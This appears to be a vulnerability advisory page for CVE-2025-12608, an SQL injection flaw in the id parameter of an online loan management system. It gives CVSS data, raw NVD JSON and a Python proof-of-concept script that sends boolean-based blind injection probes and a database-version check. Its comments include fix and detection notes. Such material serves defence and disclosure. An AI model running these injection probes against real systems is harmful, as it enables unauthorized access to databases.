Security Vulnerability Report
CVE-2025-12608 CVSS 7.3 HIGH

CVE-2025-12608

Published: 2025-11-03 01:15:43
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in itsourcecode Online Loan Management System 1.0. The affected element is an unknown function of the file /manage_user.php. Manipulating the argument ID results in SQL injection. The attack can be carried out remotely. The exploit has been released publicly, so the flaw may be exploited.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 HIGH score and this vector are the CVSS 3.1 assessment tagged "Secondary" in the raw JSON below. The same record also carries a CVSS 3.1 assessment tagged "Primary" — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, base score 9.8 CRITICAL — and a CVSS 4.0 Secondary score of 5.5 MEDIUM; the weakness is classified as CWE-89 (SQL injection).

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:online_loan_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Loan Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12608 SQL Injection PoC
# Target: itsourcecode Online Loan Management System 1.0
# File: /manage_user.php
# Parameter: ID
#
# Defender's note: per the CVE description the `id` argument of
# /manage_user.php reaches a SQL statement unvalidated (CWE-89). The
# application-side fix is a parameterized query (and, for a numeric id,
# rejecting any value that is not an integer). On the detection side, the
# probes this script sends place a single quote, an AND clause and a
# `-- -` comment terminator into the `id` query string; that is what
# access-log review or a WAF rule for this endpoint should key on.


def exploit_sqli(target_url, param_id):
    """
    SQL Injection exploit for CVE-2025-12608
    Tests for boolean-based blind SQL injection

    Sends a "true" probe and a "false" probe to /manage_user.php and treats
    differing HTTP status codes as evidence of injection; when they differ,
    one further probe is sent to check for a MySQL 5.x version string.
    Progress is reported with print(); nothing about the responses is
    returned to the caller.

    Args:
        target_url: Base URL of the application, without a trailing slash
            (the script appends "/manage_user.php?id=...").
        param_id: Value used as the baseline `id` and as the prefix of
            every probe (coerced with str() before substitution).

    Returns:
        False only when a request raises requests.exceptions.RequestException
        (timeout, connection error, ...). True in every other case --
        including the "inconclusive" branch -- so the return value alone
        does not say whether the target is vulnerable.
    """
    # Normal request baseline
    baseline_url = f"{target_url}/manage_user.php?id={param_id}"

    # Boolean-based blind SQL injection test
    # Extract database version using substring and comparison
    # NOTE: payloads[2] is built but never read; the version probe further
    # down rebuilds the identical string as version_payload.
    payloads = [
        f"{param_id}' AND 1=1 -- -",  # True condition
        f"{param_id}' AND 1=2 -- -",  # False condition
        f"{param_id}' AND (SELECT SUBSTRING(@@version,1,1))='5' -- -",  # MySQL 5.x
    ]

    print(f"[*] Target: {target_url}")
    print(f"[*] Testing SQL Injection on parameter ID: {param_id}")

    try:
        # Test true condition
        # Each probe is substituted for the baseline id with str.replace;
        # every request uses a 10 s timeout.
        resp_true = requests.get(baseline_url.replace(str(param_id), payloads[0]), timeout=10)

        # Test false condition
        resp_false = requests.get(baseline_url.replace(str(param_id), payloads[1]), timeout=10)

        # Compare responses to confirm vulnerability
        # Only HTTP status codes are compared, never response bodies;
        # identical codes take the "inconclusive" branch below.
        if resp_true.status_code == 200 and resp_false.status_code != resp_true.status_code:
            print("[+] SQL Injection vulnerability confirmed!")
            print("[+] True condition returns different response than false condition")

            # Extract database version
            print("[*] Attempting to extract database version...")
            version_payload = f"{param_id}' AND (SELECT SUBSTRING(@@version,1,1))='5' -- -"
            resp_version = requests.get(baseline_url.replace(str(param_id), version_payload), timeout=10)

            # A status code matching the "true" probe is read as MySQL 5.x;
            # nothing is printed when it does not match.
            if resp_version.status_code == resp_true.status_code:
                print("[+] Database appears to be MySQL 5.x")
        else:
            print("[-] SQL Injection test inconclusive")
            print(f"[*] Response codes - True: {resp_true.status_code}, False: {resp_false.status_code}")

    except requests.exceptions.RequestException as e:
        # Transport-level failures only; HTTP error statuses do not raise
        # here and fall through to the status-code comparison above.
        print(f"[-] Request failed: {e}")
        return False

    return True


if __name__ == "__main__":
    # Needs at least two positional arguments (base URL, id value);
    # any extra arguments are ignored.
    if len(sys.argv) > 2:
        target = sys.argv[1]
        param_id = sys.argv[2]
        exploit_sqli(target, param_id)
    else:
        print("Usage: python cve-2025-12608.py <target_url> <id_value>")
        print("Example: python cve-2025-12608.py http://target.com 1")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12608", "sourceIdentifier": "[email protected]", "published": "2025-11-03T01:15:42.823", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in itsourcecode Online Loan Management System 1.0. The affected element is an unknown function of the file /manage_user.php. Performing manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, 
"cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:online_loan_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E9FED56B-4CFE-4A49-88D0-68A047A875C4"}]}]}], "references": [{"url": "https://github.com/cintahue/CVE/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?ctiid.330898", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330898", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678244", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}